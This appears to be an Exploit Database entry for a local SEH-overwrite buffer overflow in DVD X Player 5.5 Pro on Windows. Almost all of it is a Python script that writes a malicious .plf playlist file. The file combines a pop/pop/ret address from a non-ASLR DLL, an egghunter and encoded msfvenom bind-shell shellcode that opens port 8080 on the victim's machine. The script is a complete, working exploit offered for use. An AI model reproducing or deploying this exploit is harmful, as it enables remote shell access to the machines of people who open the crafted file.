DVD X Player 5.5 Pro – Overwrite (SEH)

• Exploit Database
• 19 阅读

• 作者： blake
  日期： 2011-09-06
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17788/

• # DVD X Player 5.5 Pro
  # Bypass ASLR by using non-aslr enabled module
  # SEH Overwrite
  # Egghunter is not needed as there is at least 2000 bytes for shellcode
  
  
  import sys
  
  print "===================================="
  print "DVD X Player 5.5 Pro Buffer Overflow"
  print "SEH Overwrite - Bypass ASLR "
  print " Written by Blake "
  print "===================================="
  
  # size = 325 bytes
  # ./msfvenom -p windows/shell/bind_tcp LPORT=8080 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x1a' -f c
  shellcode=(
  "\xba\x16\x44\x8a\xd1\xdb\xd1\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
  "\x4b\x31\x55\x14\x83\xc5\x04\x03\x55\x10\xf4\xb1\x76\x39\x71"
  "\x39\x87\xba\xe1\xb3\x62\x8b\x33\xa7\xe7\xbe\x83\xa3\xaa\x32"
  "\x68\xe1\x5e\xc0\x1c\x2e\x50\x61\xaa\x08\x5f\x72\x1b\x95\x33"
  "\xb0\x3a\x69\x4e\xe5\x9c\x50\x81\xf8\xdd\x95\xfc\xf3\x8f\x4e"
  "\x8a\xa6\x3f\xfa\xce\x7a\x3e\x2c\x45\xc2\x38\x49\x9a\xb7\xf2"
  "\x50\xcb\x68\x89\x1b\xf3\x03\xd5\xbb\x02\xc7\x06\x87\x4d\x6c"
  "\xfc\x73\x4c\xa4\xcd\x7c\x7e\x88\x81\x42\x4e\x05\xd8\x83\x69"
  "\xf6\xaf\xff\x89\x8b\xb7\x3b\xf3\x57\x32\xde\x53\x13\xe4\x3a"
  "\x65\xf0\x72\xc8\x69\xbd\xf1\x96\x6d\x40\xd6\xac\x8a\xc9\xd9"
  "\x62\x1b\x89\xfd\xa6\x47\x49\x9c\xff\x2d\x3c\xa1\xe0\x8a\xe1"
  "\x07\x6a\x38\xf5\x31\x31\x55\x3a\x0f\xca\xa5\x54\x18\xb9\x97"
  "\xfb\xb2\x55\x94\x74\x1c\xa1\xdb\xae\xd8\x3d\x22\x51\x18\x17"
  "\xe1\x05\x48\x0f\xc0\x25\x03\xcf\xed\xf3\x83\x9f\x41\xac\x63"
  "\x70\x22\x1c\x0b\x9a\xad\x43\x2b\xa5\x67\xec\x9a\x81\xdb\x7b"
  "\xde\x35\xc3\xeb\x57\xd3\x91\x1b\x31\x4b\x0e\xde\x66\x44\xa9"
  "\x21\x4d\xf8\x62\xb6\xda\x16\xb4\xb9\xdb\x3c\x96\x16\x74\xd7"
  "\x6d\x75\x41\xc6\x71\x50\xe2\x9f\xe6\x2e\x62\xed\x97\x2f\xaf"
  "\x87\x57\xba\x4b\x0e\x0f\x52\x51\x77\x67\xfd\xaa\x52\xf3\x34"
  "\x3e\x1d\x6c\x39\xae\x9d\x6c\x6f\xa4\x9d\x04\xd7\x9c\xcd\x31"
  "\x18\x09\x62\xea\x8d\xb1\xd3\x5e\x05\xd9\xd9\xb9\x61\x46\x21"
  "\xec\x73\xbb\xf4\xc9\xf1\xcd\x72\x3a\x3a")
  
  # 32 byte egghunter
  egghunter =(
  "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"
  "\x54\x30\x30\x57" # egg - W00T
  "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
  
  
  # overwrite EIP = 260 bytes
  # overwrite SEH = 616 bytes - 0x61602adb pop edi; pop esi; ret [EPG.dll]
  
  egg = "\x54\x30\x30\x57\x54\x30\x30\x57"
  buffer = "\x41" * 608
  next_seh = "\xeb\x06\x90\x90"	# jump forward 6 bytes
  seh = "\xdb\x2a\x60\x61"	# pop/pop/ret
  nops = "\x90" * 20
  
  print "[+] Creating malicious plf"
  try:
  	file = open("owned.plf","w")
  	file.write(buffer + next_seh + seh + nops + egghunter + nops + egg + shellcode)
  	file.close()
  	print "[+] File created successfully"
  	raw_input("[+] Press any key to exit")
  except:
  	print "[X] Error creating file!"
  	sys.exit(0)